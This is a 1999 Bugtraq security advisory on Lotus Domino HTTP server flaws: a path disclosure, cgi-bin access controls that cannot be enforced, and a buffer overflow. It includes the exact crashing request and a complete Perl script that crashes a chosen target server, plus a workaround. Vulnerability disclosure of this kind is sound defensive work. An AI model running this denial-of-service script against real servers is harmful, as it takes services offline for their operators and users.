Home page logo
/

bugtraq logo Bugtraq mailing list archives

serious Lotus Domino HTTP denial of service
From: Alain.Thivillon () HSC FR (Alain Thivillon)
Date: Tue, 21 Dec 1999 11:42:13 +0100


Greetings,

Lotus Domino HTTP server can be used as a traditional Web server, with
static html documents and cgi-bin scripts handling. These features are
turned on by default, and use /cgi-bin virtual path, mapped to
<NOTESDATA>\domino\cgi-bin directory.

When doing audit of these functions, we found three vulnerabilites in
handling of cgi requests:

 1. Domino server exposes configuration of local filesystem:

   When requesting http://server/cgi-bin/blabla, HTTP response is

   Error 500
   Bad script request -- no variation of 'c:/notes/data/domino/cgi-bin/blabla' is executable

   This can be used to obtain OS and installation details.

 2. Turning off anonymous access in server document of Notes Name &
   Adress Book as no effect for cgi-bin directory : anonymous access is
   still permitted. The same applies to "SSL redirection of entire
   server" : cgi-bin can still be accessed via HTTP port.

 3. Now the worst ...

    Handling of response to bad requests (see 1) is vulnerable to a
    buffer overflow : by sending a large URL relative to cgi-bin, HTTP task
    crashes immediatly, and does not service requests anymore (including
    standard Notes database access by HTTP). If Domino is launched as a
    NT service, service will not stop completly, you need to kill remaining
    processes (using kill.exe in Reskit) or reboot Windows NT.

    We notice that all requests does not crash server, but sending
    'GET /cgi-bin/... (800 .) aaaa (4000 a) HTTP/1.0' kills nHTTP.exe
    every time.

    We were able to reproduce this on all 4.6.X series, including
    4.6.6b, wich seems the last version accessible on www.notes.net.

    I was not able to overwrite return address (just DS), but i made very few
    tests, and buffer overflow is maybe exploitable to execute arbitrary
    code. I didn't test Denial of service on Unix versions, but problems 1.
    and 2. are present. The same remark applies to Domino 5.x.

    We send several emails to security () lotus com in the past 10 days, we
    receive no answers nor bounces.

    Demonstration script using Perl LWP module is given below. A nessus
    plugin will be available in a few hours on http://www.nessus.org/,
    thanks to Renaud Deraison.

Workaround:

    If you don't use cgi-bin on your Domino server, change cgi-bin
    virtual directory in server document to something impossible to guess.
    Leaving field empty has no effect. We didn't find an definitive way to
    stop cgi-bin handling.

Demonstration script:

#!/usr/bin/perl -w
# This will crash Lotus Domino Server (tested on 4.6.4,4.6.5,4.6.6 and
# 4.6.6b).
# (c) Alain Thivillon, Stephane Aubert and Herve Schauer Consultants 1999

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("a");

$target='Insertyourtargetnamehere';

$url="http://".$target."/cgi-bin/".'.'x800;
$url.='a'x4000;
my $req = new HTTP::Request GET => $url;

my $res = $ua->request($req);

if ($res->is_success) {
  print $res->content;
}
else {
  print "Well done, Joe\n";
}

--
Alain Thivillon -+- Alain.Thivillon () hsc fr -+- Hervé Schauer Consultants
The world is ending in 10 days, 12 hours, 45 min, 55 sec : save your buffers



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]